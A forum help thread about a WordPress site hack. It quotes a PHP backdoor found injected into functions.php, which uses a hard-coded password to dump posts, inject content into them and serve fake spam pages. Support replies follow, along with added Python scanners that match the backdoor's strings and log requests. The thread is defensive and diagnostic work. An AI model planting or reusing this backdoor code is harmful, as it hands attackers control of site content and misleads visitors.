Site hacked? Code added in functions.php

Hello,

On some of my websites, this code has been added at the top of functions.php (it uses mysql_escape_string, so PHP errors out under PHP 7). Do you know where it comes from? Have my websites been hacked?

<?php

// Backdoor entry point: reacts to any request that carries action= together with the hard-coded password token
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '3801616fd2603d331cbc3e5443ad0364'))
{
    switch ($_REQUEST['action'])
    {
        // Dumps every published post (URL, ID) together with any <div id="wp_cd_code"> payload already injected into it
        case 'get_all_links';
            foreach ($wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'posts WHERE post_status = "publish" AND post_type = "post" ORDER BY ID DESC', ARRAY_A) as $data)
            {
                $data['code'] = '';

                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                {
                    $data['code'] = $_[1];
                }

                print '<e><w>1</w><url>' . $data['guid'] . '</url>' . $data['code'] . '<id>' . $data['ID'] . '</id></e>' . "\r\n";
            }
            break;

        // Replaces (or removes) the injected <div id="wp_cd_code"> block in one post with request-supplied content
        case 'set_id_links';
            if (isset($_REQUEST['data']))
            {
                $data = $wpdb -> get_row('SELECT post_content FROM ' . $wpdb->prefix . 'posts WHERE ID = "'.mysql_escape_string($_REQUEST['id']).'"');

                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                if ($wpdb->query('UPDATE ' . $wpdb->prefix . 'posts SET post_content = "' . mysql_escape_string($post_content) . '" WHERE ID = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                {
                    print "true";
                }
            }
            break;

        // Creates or deletes rows in a separate {prefix}datalist table holding fake pages that the code below serves
        case 'create_page';
            if (isset($_REQUEST['remove_page']))
            {
                if ($wpdb -> query('DELETE FROM ' . $wpdb->prefix . 'datalist WHERE url = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                {
                    print "true";
                }
            }
            elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
            {
                if ($wpdb -> query('INSERT INTO ' . $wpdb->prefix . 'datalist SET url = "/'.mysql_escape_string($_REQUEST['url']).'", title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string($_REQUEST['content']).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                {
                    print "true";
                }
            }
            break;

        default: print "ERROR_WP_ACTION WP_URL_CD";
    }

    die("");
}

// Runs on every front-end request: if the requested URI matches a stored fake page, that page is served instead of the real site
if ( $wpdb->get_var('SELECT count(*) FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
    $data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    if ($data -> full_content)
    {
        print stripslashes($data -> content);
    }
    else
    {
        print '<!DOCTYPE html>';
        print '<html ';
        language_attributes();
        print ' class="no-js">';
        print '<head>';
        print '<title>'.stripslashes($data -> title).'</title>';
        print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
        print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
        print '<meta name="robots" content="index, follow" />';
        print '<meta charset="';
        bloginfo( 'charset' );
        print '" />';
        print '<meta name="viewport" content="width=device-width">';
        print '<link rel="profile" target="_blank" href="http://gmpg.org/xfn/11">';
        print '<link rel="pingback" href="';
        bloginfo( 'pingback_url' );
        print '">';
        wp_head();
        print '</head>';
        print '<body>';
        print '<div id="content" class="site-content">';
        print stripslashes($data -> content);
        get_search_form();
        get_sidebar();
        get_footer();
    }

    exit;
}

?>
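An added example (not from the thread or from any product mentioned in it): a small Python scanner that looks for the distinctive strings of the code quoted above (the hard-coded password comparison, the three action names, the wp_cd_code marker, the datalist table and the PHP 5-only mysql_escape_string) in theme PHP files, so the other sites can be checked for the same injection. The two sample sources are constructed for the demonstration.

```python
import re
from pathlib import Path

# Indicators lifted from the injected code quoted in the question above.
INDICATORS = {
    "hardcoded_password_hash": re.compile(r"\$_REQUEST\['password'\]\s*==\s*'[0-9a-f]{32}'"),
    "request_action_switch": re.compile(r"switch\s*\(\s*\$_REQUEST\['action'\]"),
    "backdoor_action_name": re.compile(r"'(get_all_links|set_id_links|create_page)'"),
    "wp_cd_code_marker": re.compile(r"wp_cd_code"),
    "datalist_table": re.compile(r"\$wpdb->prefix\s*\.\s*'datalist\b"),
    "mysql_escape_string": re.compile(r"\bmysql_escape_string\s*\("),  # removed in PHP 7
    "error_marker": re.compile(r"ERROR_WP_ACTION WP_URL_CD"),
}

def scan_source(source: str) -> dict[str, list[int]]:
    """Map each indicator found in `source` to the 1-based line numbers where it occurs."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def scan_theme_dir(root: str) -> dict[str, dict[str, list[int]]]:
    """Scan every .php file below `root` (e.g. wp-content/themes) and report only files with hits."""
    report: dict[str, dict[str, list[int]]] = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample that mimics the head of the injected functions.php (not a real file).
INJECTED_SAMPLE = """<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '3801616fd2603d331cbc3e5443ad0364'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
if ($wpdb -> query('DELETE FROM ' . $wpdb->prefix . 'datalist WHERE url = "/'.mysql_escape_string($_REQUEST['url']).'"'))
"""

# Constructed sample of an ordinary theme functions.php with nothing suspicious in it.
CLEAN_SAMPLE = """<?php
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
});
"""
```

Run `scan_theme_dir("wp-content/themes")` from the WordPress root; any file that reports `hardcoded_password_hash` or `backdoor_action_name` should be diffed against a fresh copy of the theme package.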

  • Adam Czajczyk

    Hello Jean,

    I hope you're well today and thank you for your question!

    I believe I have seen that code once on some site, but I was told that the theme was "as the theme install package provided". It seems, however, that it might need some further investigation.

    I'm not sure where this code came from, but can you please tell me which themes it affected?

    As for prevention: changing file permissions for theme files to 644 or even 444 using FTP or cPanel's "File Manager" tool should stop any code from being added unless there are other "security glitches". It would, however, be best to get in touch with your host and ask them to review server logs to check for any suspicious/malicious activity. That could help identify the source of that code and pinpoint potential threats. Could you ask them to check these logs for you?

    Let me know about results, please.

    Kind regards,
    Adam

  • Adam Czajczyk

    Hello Jean!

    Thank you for your reply. It certainly does look like a "hack"; my point was only that when I came across it (only once so far) I was specifically told by the site owner that I shouldn't worry about it, as the issue was completely unrelated. The question, though, is how to prevent it rather than where it comes from.

    Wordfence should help, and our Defender would also be helpful alongside it. Changing file permissions as I suggested in my previous post would also prevent code from being added to the file, unless there's a "security glitch" at server level, in which case it would be a server admin's task to identify and remove it.

    It would, however, be good to review server logs and site statistics in search of any "suspicious traffic", as usually it can be pinpointed and assigned to some IPs/domains. Those could then be blocked, which should additionally protect the site in future.

    Kind regards,
    Adam
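An added example (not from the thread, not Wordfence or Defender code) of the log review suggested above: the injected code only answers requests that carry action=get_all_links, set_id_links or create_page together with a password parameter, so those query strings are a precise signature to search for in the web server access log. The combined log format is assumed, and the sample lines and IP addresses are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Assumed "combined" access-log layout (Apache/Nginx default); adjust the regex for other formats.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Action names accepted by the switch in the injected code.
BACKDOOR_ACTIONS = {"get_all_links", "set_id_links", "create_page"}

def is_backdoor_request(uri: str) -> bool:
    """True when the query string carries both a backdoor action and a password parameter."""
    params = parse_qs(urlsplit(uri).query)
    return bool(set(params.get("action", [])) & BACKDOOR_ACTIONS) and "password" in params

def flag_backdoor_hits(log_text: str) -> list[dict]:
    """Return one record per log line whose query string matches the backdoor's interface.
    Only GET parameters are visible here: the code reads $_REQUEST, so POST bodies bypass
    this check and need request-body logging or a WAF rule to catch."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_backdoor_request(m["uri"]):
            hits.append({"ip": m["ip"], "time": m["time"], "uri": m["uri"], "status": m["status"]})
    return hits

def offending_ips(hits: list[dict]) -> Counter:
    """Count flagged requests per client IP, the list one would hand to the host for blocking."""
    return Counter(h["ip"] for h in hits)

# Constructed sample log; the IPs are documentation ranges and the lines are not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2018:11:02:13 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2018:11:04:40 +0000] "GET /?action=get_all_links&password=3801616fd2603d331cbc3e5443ad0364 HTTP/1.1" 200 812 "-" "python-requests/2.18.4"
203.0.113.5 - - [10/Mar/2018:11:05:02 +0000] "GET /?s=hello HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2018:11:06:15 +0000] "GET /?action=create_page&password=3801616fd2603d331cbc3e5443ad0364&url=promo&title=x&content=y HTTP/1.1" 200 4 "-" "python-requests/2.18.4"
198.51.100.7 - - [10/Mar/2018:11:07:30 +0000] "GET /?action=unrelated&password=x HTTP/1.1" 200 4410 "-" "curl/7.58.0"
"""
```

Because the hook runs from functions.php, the matching requests can target any front-end URL, not just a theme path, so filter on the query string rather than on the request path.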
